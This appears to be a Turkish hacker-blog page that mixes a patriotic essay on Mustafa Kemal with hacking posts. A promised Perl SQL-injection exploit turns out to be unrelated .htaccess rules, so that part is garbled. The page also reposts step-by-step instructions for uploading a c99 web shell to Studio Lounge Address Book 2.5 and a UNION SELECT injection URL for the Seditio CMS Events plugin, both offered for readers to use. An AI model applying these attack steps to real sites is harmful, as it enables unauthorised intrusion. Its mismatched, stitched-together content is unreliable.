Net-Frozen.TurkBlog.Com BekleyiN :d

Tarih 16 Mayıs 1919..Gözlerini para,hırs bürümüş düşman yığını zamanın efsane gemileriyle boğazdan geçiş yapıyor.Bunu gören Mustafa Kemal unutulmaz vecizelerinden birini söylüyor: ” Geldiğiniz gibi gideceksiniz! ” Milli mücadelenin bir an önce başlaması gerektiğini düşünen Mustafa Kemal 19Mayıs 1919 günü Samsun’a çıktı.Kongreler,bildiriler yoluyla halkı düşman devletlere karşı bilinçlendiren,kuvay-i milliye ruhunu ortaya çıkaran paşa, yaptığı işi meşrulaştırmak amacıyla önemli komutanların desteğini aldı.Yokluk içinde eldeki imkanlar dahilinde vatanı savunan,bağımsızlığını kaybetmeyi onursuzluk olarak nitelendiren bir milleti devletsiz bırakmamak için TÜRKİYE CUMHURİYETİ’ni kuran Gazi Mustafa Kemal ne yazıkki kendinden sonra gelen kişilerin devlet çıkarları yerine kendi çıkarları doğrultusunda hareket edeceklerini hesap edememişti.Cumhuriyetçilik,laiklik,milliyetcilik ilkelerini ortaya koyan,son derece de güzel uygulanan yasalar zaman içinde değiştirildi.Mustafa Kemal’in izleri silinmeye çalışıldı ve halada çalışılıyor. Milli Mücadelenin başlangıç tarihi olarak kabul edilen 19Mayısı gençlere armağan eden Mustafa Kemal’i saygı ve rahmetle anıyor,gençlerimizin bayramını kutluyoruz.
Yazar “Mustafa Albayrak”
Selamun Aleykum Arkadaslar...
Son zamanların modası olan sql de size büyük bir kolaylık sağlıyacak perl exploiti vereceğim...
örneğin bir sitede sql injection hatası buldunuz tablo adını tahmin edemiyorsunuz ya da uğrasmak istemiyorsunuz bu exploit tam size göre... fazla uzatmadan kodları vereyim...
Exploiti perlde çalıstırabilirsiniz... Konu Hakkında sorusu olan konu altından belirtsin..
#!/usr/bin/perl
Order Deny, Allow
Deny from all
Order Allow, Deny
Deny from all
Dosya formatlarını cogaltabilirsiniz
Deny from all
inc|txt|sql|iniyerine zip rar jpg vs vs. ekleyip cıkartabilirsiniz.
Deny from all
Allow from ip yada domain
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{HTTP_REFERER} .
RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com(/.*)?$ [NC]
RewriteRule \.(gif|jpe?g|bmp|png)$ - [F,L]
ForceType application/x-httpd-php4
milw0rm da bugun yayınlanmış 2 adet bug. biri sql injection biri file upload.
Studio Lounge Address Book 2.5
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
- download: http://www.studiolounge.net/2007/08/17/address-book-25
- etkilenen dosya: upload-file.php
bu dosya yuklenen dosyanın turune onem vermiyor.
~ [EXPLOITING]
1) /index2.php?title=add (shell upload edebilirsin, mesela c99 shell)
2) Upload ettikten sonra "View Full Information"(detay sayfasına git)
(ornek: index2.php?title=fullview&id=150)
3) kaynak kodunu goreceksin "profiles/imagethumb.php?s="
(ornek: profiles/imagethumb.php?s=57b7b72739c79f02d990c4239c4169b9.php)
4) shell adresi: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php
Seditio CMS Events Plugin
Exploit
http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*
sed. tablolarını bilmedigim icin bugger in verdigi sorguyu yazdım gerisi size kalmış.
ornek kullanım :plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*